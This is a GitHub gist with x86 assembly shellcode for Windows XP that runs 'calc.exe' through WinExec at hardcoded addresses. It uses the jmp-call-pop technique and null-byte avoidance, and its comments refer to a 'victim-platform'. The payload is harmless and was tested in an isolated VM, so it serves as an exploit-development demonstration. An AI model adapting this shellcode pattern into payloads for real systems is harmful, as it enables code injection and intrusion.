Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
[SECTION .text]
global _start
_start:
jmp short getData
execIt:
pop ebx ;Get the string off stack
xor eax,eax ;Clear eax
mov [ebx+8],al ;This helps us to avoid having a zero byte in our code.
;It sets the terminator to the string.
push eax ;Second argument for WinExec
push ebx ;Use this as first argument for WinExec
mov eax,0x7c8623ad ;This is the address of the function.
;You need to find it out for the desired victim-platform.
;It changes only between different Windows versions
;and patch levels. This reflects the address on
;my VirtualBox running some XP. I don't give a damn on its
;patchlevel, because its insulated.
call eax ;Call it!
end: ;now we clean up a bit
xor eax,eax
push eax
mov eax,0x7c81cafa ;The address of ExitProcess on my VirtualBox, running XP
call eax ;Good bye!
getData:
call execIt ;Get the following string on stack.
db 'calc.exe0'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment